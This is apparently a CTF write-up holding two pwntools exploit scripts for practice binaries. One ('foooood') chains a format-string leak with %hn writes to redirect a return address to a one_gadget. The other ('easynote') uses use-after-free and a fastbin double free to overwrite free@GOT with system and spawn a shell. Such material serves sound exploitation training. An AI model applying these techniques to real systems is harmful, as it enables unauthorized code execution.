foooood(跟我的题思路一模一样,气死)
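from pwn import *

context(os='linux', arch='amd64')  # need tmux for attach()
context.log_level = "debug"

# p = remote("node4.buuoj.cn", 26443)
p = process("./pwn")

# ---------------------------------------------------------------------------
# Stage 1: leaks.  The name buffer gets "/bin/sh"; the first "food" is a
# format string that dumps two stack slots, separated by '^' so they can be
# parsed back out:
#   %9$p  -> a libc pointer (the author treats it as the return address into
#            __libc_start_main)
#   %11$p -> a stack pointer, used below to locate the loop counter and the
#            saved return address
# ---------------------------------------------------------------------------
p.sendlineafter("Give me your name:", b"/bin/sh")
p.sendlineafter("food:", b'%9$p^%11$p^')
# [10:-1] skips the program's echo prefix in front of the first "0x..."; this
# slice is tied to the binary's exact output format — re-check it if the
# prompt text differs on the target.
libc_leak = int(p.recvuntil("^")[10:-1], 16)
# 0x20750 + 240: offset of the leaked return address inside the AUTHOR's libc
# build; re-derive it for the target's libc before use.
libc_base = libc_leak - 0x20750 - 240
stack = int(p.recvuntil("^")[:-1], 16)

# Sanity-check the leaks now: a mis-parsed leak otherwise only shows up as a
# crash after the whole write chain has already been sent.
if libc_base & 0xfff:
    raise RuntimeError("libc base is not page aligned: %#x" % libc_base)
if not 0 < stack < (1 << 47):
    raise RuntimeError("stack leak is not a user-space address: %#x" % stack)

# The local the author overwrites sits at a fixed distance from the leaked
# slot; both constants come from a debugging session and only their
# difference matters.
i_addr = stack - (0x7ffc0bd8af08 - 0x7ffc0bd8ae40)
# one_gadget offset for the author's libc; verify with `one_gadget` against
# the target's libc and check its register constraints.
one = libc_base + 0x45226
print(hex(one))


# ---------------------------------------------------------------------------
# Stage 2: arbitrary writes through a two-level format-string primitive.
#   "%N p %11$hn"  -> stores the low 16 bits of N into the stack slot read as
#                     argument 11, which is itself a pointer to the slot read
#                     as argument 37
#   "%N p %37$hn"  -> writes N through that pointer (hhn: one byte)
# NOTE(review): "%Np" pads to at least N characters but never fewer than the
# pointer's own printed length, so a small N (the 1 written into the counter
# below) may not produce the intended value; "%Nc" pads to exactly N.  Confirm
# what the first vararg prints as before relying on this.
# ---------------------------------------------------------------------------
def set_write_ptr(addr):
    """Point the argument-37 slot at `addr` by rewriting its low 16 bits."""
    p.sendlineafter("food:", "%{}p%11$hn".format(addr & 0xffff))


def write16(value):
    """Write the low 16 bits of `value` through the argument-37 pointer."""
    p.sendlineafter("food:", "%{}p%37$hn".format(value & 0xffff))


def write8(value):
    """Write the low 8 bits of `value` through the argument-37 pointer."""
    p.sendlineafter("food:", "%{}p%37$hhn".format(value & 0xff))


# Reset the loop counter (presumably at i_addr - 0x2c) so enough rounds remain
# for the rest of the chain — confirm the slot in gdb with attach(p).
set_write_ptr(i_addr - 0x30 + 4)
write8(1)
# Patch the saved return address (presumably at i_addr - 0x18) with the
# one_gadget: low 16 bits, then the third byte (the upper bytes already match
# libc's mapping).
set_write_ptr(i_addr - 0x18)
write16(one & 0xffff)
set_write_ptr(i_addr - 0x18 + 2)
write8((one & 0xff0000) // 0x10000)

# Feed dummy food until the loop exits and the function returns into the
# one_gadget.  (The original paste lost its indentation; the final send is
# taken as one extra round after the loop, which is how the author's 8 + 1
# layout reads.)
for _ in range(8):
    p.sendlineafter("food:", "1")
p.sendlineafter("food:", "1")
print(hex(libc_base))
p.interactive()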
easynote(两个大洞,但one不通)
uaf和堆溢出都有，做法挺多，后面试试
1.改堆指针表,写free_got,free一个“/bin/sh”(我的exp)
2.realloc调栈,跳malloc_hook的one
3.unlink
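from pwn import *

# The target is a 64-bit binary: the leak below is unpacked with u64 and the
# note table lives at 0x6020c0.  The original had arch='i386'; p64/u64 are
# explicit so the chain still worked, but context-dependent helpers (flat,
# asm, ...) would have defaulted to 32-bit packing.
context(arch='amd64', log_level='debug', os='linux')
elf = ELF("./pwn")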
def malloc(size, contet):
    """Menu option 1: allocate a `size`-byte note and fill it with `contet`.

    `contet` is sent raw (no trailing newline), so it may contain packed
    pointers.  Talks to the module-level connection `p`.
    """
    menu_prompt, field_prompt = "5. exit", "--->"
    p.sendlineafter(menu_prompt, b'1')
    p.sendlineafter(field_prompt, str(size))
    p.sendafter(field_prompt, contet)


def free(id):
    """Menu option 3: release note number `id`.

    The main script reads note 0 back with show() right after freeing it, so
    the program evidently keeps the freed pointer in its table.
    """
    menu_prompt, field_prompt = "5. exit", "--->"
    p.sendlineafter(menu_prompt, b'3')
    p.sendlineafter(field_prompt, str(id))
def edit(id, size, contet):
    """Menu option 2: overwrite note `id` with up to `size` bytes from `contet`.

    The index and length are sent as lines; the payload itself is sent raw.
    Talks to the module-level connection `p`.
    """
    p.sendlineafter("5. exit", b'2')
    for field in (str(id), str(size)):
        p.sendlineafter("--->", field)
    p.sendafter("--->", contet)
def show(id):
    """Menu option 4: ask the program to print note `id`.

    Nothing is read back here; the caller parses the output itself.
    """
    choice, index = b'4', str(id)
    p.sendlineafter("5. exit", choice)
    p.sendlineafter("--->", index)
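# p = process('./pwn')
p = remote('node4.buuoj.cn', 26517)
libc = ELF('libc-2.23.so')

# Heap layout: two 0x90 chunks (too big for the fastbins, so they go to the
# unsorted bin when freed), two 0x70 fastbin chunks for the double free, and a
# "/bin/sh" note (index 4) that is freed at the very end.
malloc(0x80, b'qwer')      # note 0
malloc(0x80, b'qwer')      # note 1: keeps note 0 away from the top chunk
malloc(0x68, b'qwer')      # note 2
malloc(0x68, b'qwer')      # note 3
malloc(0x68, b'/bin/sh')   # note 4

# Stage 1: libc leak.  Freed note 0 carries bin pointers into libc (presumably
# main_arena) and show(0) still prints it.  recv(7)[1:] takes the 6
# significant pointer bytes after a one-byte prefix and pads back to 8.
free(0)
show(0)
p.recvuntil(":")
leak = u64(p.recv(7)[1:] + b'\0' * 2)
# The two constants are the leaked value and libc base from the author's run;
# only their difference (the in-libc offset of the leaked pointer) matters, and
# it must be re-derived for any other libc build.
libc_base = leak - (0x7fef613c4b78 - 0x7fef61000000)
# Catch a mis-parsed leak here rather than as a crash after the GOT write.
if libc_base & 0xfff:
    raise RuntimeError("libc base is not page aligned: %#x" % libc_base)
system = libc_base + libc.sym["system"]
free_got = elf.got['free']
print(hex(libc_base))
print(hex(free_got))

# Stage 2: fastbin dup.  free(2), free(3), free(2) leaves chunk 2 twice in the
# 0x70 fastbin.  The next malloc hands chunk 2 back and its fd is overwritten
# with a fake chunk address just below the note table in .bss; the -0x23 offset
# presumably lines the fake size field (0x6020a5) up with a 0x7f byte from a
# libc pointer stored nearby — confirm in gdb.  Two more mallocs drain the bin
# and the fourth allocation lands on the fake chunk.
free(2)
free(3)
free(2)
malloc(0x68, p64(0x6020c0 - 0x23))
malloc(0x68, b'ase')
malloc(0x68, b'ase')
# The fake chunk's user data starts 0x13 bytes before the table at 0x6020c0:
# pad up to it, then make table entry 0 point at free@GOT.  The padding also
# clobbers whatever lives in 0x6020ad..0x6020bf — harmless in the author's run.
malloc(0x68, b'a' * (0x23 - 0x10) + p64(free_got))

# Stage 3: edit(0) now writes through the hijacked pointer, replacing free@GOT
# with system; freeing note 4 then runs system("/bin/sh").
edit(0, 10, p64(system))
p.sendlineafter("5. exit", b'3')
p.sendlineafter("--->", b'4')
p.interactive()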